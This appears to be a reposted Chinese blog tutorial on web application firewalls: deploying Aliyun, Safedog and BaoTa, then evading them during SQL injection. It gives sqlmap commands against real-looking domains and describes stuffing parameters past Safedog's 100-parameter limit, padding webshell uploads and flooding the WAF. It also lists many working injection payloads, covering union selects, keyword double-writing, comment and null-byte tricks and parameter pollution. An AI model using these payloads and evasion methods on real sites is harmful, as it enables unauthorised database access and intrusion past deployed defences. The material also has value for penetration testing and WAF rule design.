商务服务
(18)【WAF绕过】WAF部署、绕过分析和原理、注入绕过WAF方法
2024-12-24 00:51

目录

一、WAF部署

1.1、阿里云盾

1.2、安全狗

1.3、宝塔面板

下载地址

桌面应用端

web网页端

二、WAF绕过

2.1、原理

2.2、介绍

2.3、WAF分为非嵌入型WAF和嵌入型WAF

三、WAF的判断

 方法一:手动测试

方法二:sqlmap进行测试

四、超过WAF配额绕过

4.1、原理

方法一:增加参数个数

方法二:增加参数长度

方法三:增加WAF负载

五、构造异常数据包

5.1、双参数绕过

5.2、请求方式转换

5.3、绕过匹配规则

大小写变换

常用字符替换

过滤关键字

使用嵌套

双重编码

特殊符号

http 参数污染


常见的有阿里云盾、安全狗、宝塔面板

购买云服务器 ECS 即可免费使用云盾的基础功能,为中小网站提供如安全漏洞检测、网页木马检测以及面向云服务器用户提供的主机入侵检测、防DDOS等一站式安全服务

下载地址

安装教程(可能出现的错误

一体化防御:包括网络层、网站应用层、系统层防御。

网站安全狗、服务器安全狗、安全狗服云

下载地址

桌面应用端

传统的软件端操作界面,可以对服务器的站点进行高效的管理

高效的操作管理,可快速搭建站点、数据库、FTP等服务

web网页端

相对于桌面应用端有更好的体验,跨终端、跨平台

高效的操作管理,可快速搭建站点、数据库、FTP等服务

完善的在线文件管理器,轻松实现图片查看,文本编辑,文件打包解压



WAF(Web Application Firewall) 可以屏蔽常见的网站漏洞攻击,如SQL注入,XML注入、XSS等。WAF针对的是应用层而非网络层的入侵。其难点是对入侵的检测能力,尤其是对Web服务入侵的检测,WAF最大的挑战是识别率。对于已知的攻击方式,可以谈识别率,但是对于未知的攻击手段,WAF是检测不到的

大多数的WAF都是基于规则的WAF,对接数据收到的包进行正则匹配过滤,如果正则匹配到与现有漏洞知识库的攻击代码相同,则认为这个恶意代码并进行阻断。对于基于规则匹配的WAF,每天都需要及时更新最新的漏洞库。

只有在 WAF解析HTTP请求 或 WAF匹配规则 两个地方进行绕过。

第三、四步是WAF匹配到攻击之后的操作,这时候WAF已经检测到攻击了

  1. 解析http请求:协议解析模块
  2. 匹配规则:规则检测模块,匹配规则库
  3. 防御动作:return 403 或者跳转到自定义界面,或者不返回任何数据,或者拉黑IP
  4. 日志记录:记录到elk中

在实际的渗透测试过程中,经常会碰到网站存在WAF的情况。网站存在WAF,意味着我们不能使用安全工具对网站进行测试,因为一旦触碰了WAF的规则,轻则丢弃报文,重则拉黑IP。所以,我们需要手动进行WAF的绕过,而绕过WAF前肯定需要对WAF 的工作原理有一定的理解

非嵌入型WAF指的是硬件型WAF、云WAF、软件型WAF之类的;而嵌入型WAF指的是网站内置的WAF。非嵌入型WAF对Web流量的解析完全是靠自身的,而嵌入型WAF拿到的Web数据是已经被解析加工好的。所以非嵌入型的受攻击机面还涉及到其他层面,而嵌入型WAF从Web容器模块型WAF、代码层WAF往下走,其对抗畸形报文、扫操作绕过的能力越来越强。当然,在部署维护成本方面,也是越高的。



 方法一:手动测试

①最简单的SQL语句

and 1=1

and 1=2

②在域名后加上一个不存在的id参数,并且加上明显sql注入语句,查看服务器回显


方法二:sqlmap进行测试

sqlmap -u 'http://www.xxxxx.com/index.html' --batch --random-agent   

random-agent 是通过/usr/share/sqlmap/txt/user-agents.txt字典随机生成一个user-agent

对于这个网站我没检测出来是什么离大谱了 

sqlmap -u 'http://www.shmds.com/index.html' --batch --random-agent --forms --crawl=2  

 还是没测出来,但是被拉黑了,说明是有waf



为不干扰到网站的正常运行,配置WAF检测额度内进行过滤,有些WAF就会设置如果数据包长度超过所检测的长度,就会对部分数据包或者是数据包的部分内容进行无检测“放行”。

方法一:增加参数个数

配置的原因,例如safedog,只会检测前100个参数,把自己的执行语句放在100个之后

方法二:增加参数长度

文件上传漏洞利用时,增加无意义数据,webshell放在最后面;SQL注入时,增加URL编码长度,并注释掉;xss测试时加入无意义内容

方法三:增加WAF负载

向WAF发送大量正常数据包,并发送异常数据包,导致站点流量过大,可能会对部分数据包进行检查,注意分寸,避免造成宕机。



网站有1个id参数,在数据包中包含2个id参数进去,waf可能只检查第一个,第二个就被服务器执行了。

根据对WAF配置的不同

如果WAF只检验GET类型的包,忽略POST类型的包,修改数据包类型尝试绕过

如果WAF只检验POST类型的包,忽略GET类型的包,修改数据包类型尝试绕过

有时,也可尝试,把数据包改为request类型等或根本就不存在的其他类型


大小写变换

?id=-1' UnIOn SeLEct  1,VERsion(),3   


常用字符替换

greatest 替换 > 

greatest返回两个值中大的那个

?id=-1' union select greatest(ascii(substr(database(),0,1)),1) --+

substr(string,b,c)-------->截取字符串string,从第b个开始,截取c个

least  替换 <

least返回两个值中小的那个

?id=-1' union select least(ascii(substr(database(),0,1)),1000000) --+

strcmp函数

比较两个值大小,相等返回0 后者比前者大返回-1 小返回1

?id=-1' union select srtcmp(ascii(substr(database(),0,1)),100) --+


 

in 替换 =

相等返回1 不相等返回 0

?id=-1' union select substr(database()) in ("u") --+

between and 替换 =

?id=-1' union select substr(database()) between "a" and "u" --+

form for

盲注过滤逗号

?id=-1' union select(database() form 0 for 1) --+

limit A offset B

当过滤逗号时,limit 后面只能有一个参数,表示要取的数量,offset 表示跳过数量

select * from users limit 3 offset 2

表示跳过前2个,取3个,即3,4,5

benchmark替换sleep

benchmark来测速,即执行select database() 5000次所需时间

benchmark(5000,(select database()))

hex() bin() 替换 ascii()

hex(substr(database(),0,1))=55

concat_ws替换group_concat

concat_ws(",",database(),version())


过滤关键字

即过滤如select、or、from等的关键字。有些在过滤时没有进行递归过滤,而且刚好将关键字替换为空。这时候,我们可以使用穿插关键字的方法进行绕过操作


使用嵌套

对某些关键字替换为空,尝试采用嵌套双写进行绕过

SELselectECT、UNunionION


双重编码

WAF会解码后过滤


特殊符号

+(-)(@)(!)等替代空格

select+database()

select@database()

xor逻辑异或

任意一个数为NULL时,返回NULL

非NULL的数,逻辑真假值相异,返回1,否则为0

database()="admin" xor 0

  ()  %0a  ``  2个空格 替代 空格

selectdatabase()

替换and or not xor

and ----> &&    ,or ------> ||  ,xor ------> |     ,not ----->  !

替换=

like   rlike

where id rlike 1

where id like "admin"

union all select

select password from users where id rlike 1 union all select version();

版本结合

版本小于50014

select 

注释符加换行绕过

 select #a database() 

selelct %23%0a database()

(%23表示注释   %0a表示换行)

空字节 

有的过滤会碰到空字节会中止过滤

?id=1 a%00nd 1=2……

?id=1 %00 and 1=2…… 


http 参数污染

利用参数污染来导致网站和安全狗接受数据的不一致性,实现绕过的操作。当get方式进行传参时,经过&符号传入多个参数,WAF可能只检测第一个参数的值,然后台却检测最后一个传入的值,此时能够绕过WAF的防护

下图即每种服务器获得到的参数

?id=1 

安全狗收到的:  1        

被注释,没法执行,安全狗会忽略

网站收到的:  -1' union select 1,database(),3 #*/      

最新文章
广州seo网络营销培训
互联网设计基础阶段ps(10天)1.基础模块2.基础抠图3.图像校色4.人物修图5.产品修图6.形状工具7.图层样式8.图像合成+剪切蒙版9.滤
AMD Ryzen Z2 Extreme APU将为下一代手持游戏设备提供强大动力
在CPU方面,Ryzen Z2 Extreme APU将采用8核16线程的配置,包括三个Zen 5和五个Zen 5C核心,旨在最大化性能和效率。这款APU的CPU
公众号新闻排版怎么做?
随着社交媒体的不断发展,公众号已经成为企业或个人发布新闻资讯、推广品牌的重要平台。而一篇排版精良的新闻资讯类公众号推文,
【VMware】 vCenter Converter standalone 6.6.0正式版下载
Center Converter是一款强大工具,其功能和重要性在虚拟化领域中不可或缺。这个工具的核心作用是实现物理到虚拟(P2
揭秘百度SEO排名原理(从密度到用户体验)
揭秘百度SEO排名原理(从密度到用户体验)百度在互联网时代,网站的SEO排名成为了企业网络营销的核心。而要想提高网站的SEO排名
(18)【WAF绕过】WAF部署、绕过分析和原理、注入绕过WAF方法
目录 一、WAF部署: 1.1、阿里云盾 1.2、安全狗: 1.3、宝塔面板: 下载地址: 桌面应用端 web网页端
扬州SEO优化专家,助力企业网络营销腾飞
扬州SEO优化公司,致力于为企业提供专业、高效的互联网营销服务,助力企业提升品牌知名度,抢占市场份额,成为企业互联网营销的
公司规章制度与员工管理条例(通用12篇).docxVIP
公司规章制度与员工管理条例(通用12篇)第一篇:公司规章制度与员工管理条例一、薪资.本公司依照兼顾企业的维持与发展和工作人
重磅!这家公司首发OpenAI机器人 可以与人类全面对话 创始人:开始接近人类速度
  Figure首发OpenAI机器人  本周三,半个硅谷都在投的明星机器人创业公司Figure,发布了自己第一个OpenAI大模型加持的机器人
搜索引擎优化(SEO)描述撰写秘籍,打造吸睛标题,提升网站排名
SEO描述填写技巧,助您网站在搜索引擎中独树一帜。掌握关键词优化、自然语言表达、吸引点击率和避免重复,让您的网站描述更具吸